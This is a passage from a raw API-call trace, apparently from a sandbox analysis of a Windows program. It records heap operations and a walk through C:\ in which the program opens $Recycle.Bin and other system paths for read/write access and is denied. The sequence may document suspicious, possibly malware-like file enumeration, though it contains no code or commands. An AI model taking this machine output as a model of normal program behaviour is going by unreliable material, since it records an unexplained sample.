RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0059.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0059.905] AreFileApisANSI () returned 1 [0059.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0059.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0059.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6d268, cchWideChar=40 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 40 [0059.905] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133)) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0059.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.905] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x4e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x67548, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x4e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="d", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ij")) returned 0 [0059.905] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0059.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0059.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76d90 | out: hHeap=0x20000) returned 1 [0059.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0059.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0059.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0059.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0059.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76bd0 | out: hHeap=0x20000) returned 1 [0059.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0059.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0059.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0059.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0059.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0059.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0059.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0059.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0059.906] AreFileApisANSI () returned 1 [0059.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$Recycle.Bin", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin", lpUsedDefaultChar=0x0) returned 16 [0059.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0059.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0059.906] AreFileApisANSI () returned 1 [0059.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0059.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=16 | out: lpWideCharStr="C:\\$Recycle.Bin") returned 16 [0059.906] CreateFileW (lpFileName="C:\\$Recycle.Bin" (normalized: "c:\\$recycle.bin"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.907] GetLastError () returned 0x5 [0059.907] GetLastError () returned 0x5 [0059.907] SetLastError (dwErrCode=0x5) [0059.907] GetLastError () returned 0x5 [0059.907] SetLastError (dwErrCode=0x5) [0059.907] GetLastError () returned 0x5 [0059.907] SetLastError (dwErrCode=0x5) [0059.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.907] AreFileApisANSI () returned 1 [0059.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0059.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0059.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88630, cchWideChar=16 | out: lpWideCharStr="C:\\$Recycle.Bin") returned 16 [0059.907] CreateFileW (lpFileName="C:\\$Recycle.Bin" (normalized: "c:\\$recycle.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.907] GetLastError () returned 0x5 [0059.907] GetLastError () returned 0x5 [0059.907] SetLastError (dwErrCode=0x5) [0059.907] GetLastError () returned 0x5 [0059.907] SetLastError (dwErrCode=0x5) [0059.907] GetLastError () returned 0x5 [0059.907] SetLastError (dwErrCode=0x5) [0059.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0059.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0059.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0059.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0059.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0059.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0059.908] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0059.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0059.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0059.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0059.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0059.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535f8 [0059.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0059.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0059.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0059.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0059.908] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0059.908] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.908] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76bd0 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885e0 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885e0 | out: hHeap=0x20000) returned 1 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0059.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0059.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0059.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0059.909] AreFileApisANSI () returned 1 [0059.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18", lpUsedDefaultChar=0x0) returned 25 [0059.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.910] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0059.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0059.910] AreFileApisANSI () returned 1 [0059.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0059.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78f10 [0059.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=25 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18") returned 25 [0059.910] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18" (normalized: "c:\\$recycle.bin\\s-1-5-18"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.910] GetLastError () returned 0x5 [0059.910] GetLastError () returned 0x5 [0059.910] SetLastError (dwErrCode=0x5) [0059.910] GetLastError () returned 0x5 [0059.910] SetLastError (dwErrCode=0x5) [0059.910] GetLastError () returned 0x5 [0059.910] SetLastError (dwErrCode=0x5) [0059.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0059.910] AreFileApisANSI () returned 1 [0059.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0059.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78f10 [0059.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=25 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18") returned 25 [0059.911] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18" (normalized: "c:\\$recycle.bin\\s-1-5-18"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.911] GetLastError () returned 0x5 [0059.911] GetLastError () returned 0x5 [0059.911] SetLastError (dwErrCode=0x5) [0059.911] GetLastError () returned 0x5 [0059.911] SetLastError (dwErrCode=0x5) [0059.911] GetLastError () returned 0x5 [0059.911] SetLastError (dwErrCode=0x5) [0059.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0059.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0059.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.911] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.911] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.911] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.911] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885e0 [0059.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0059.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0059.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885e0 | out: hHeap=0x20000) returned 1 [0059.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0059.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0059.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 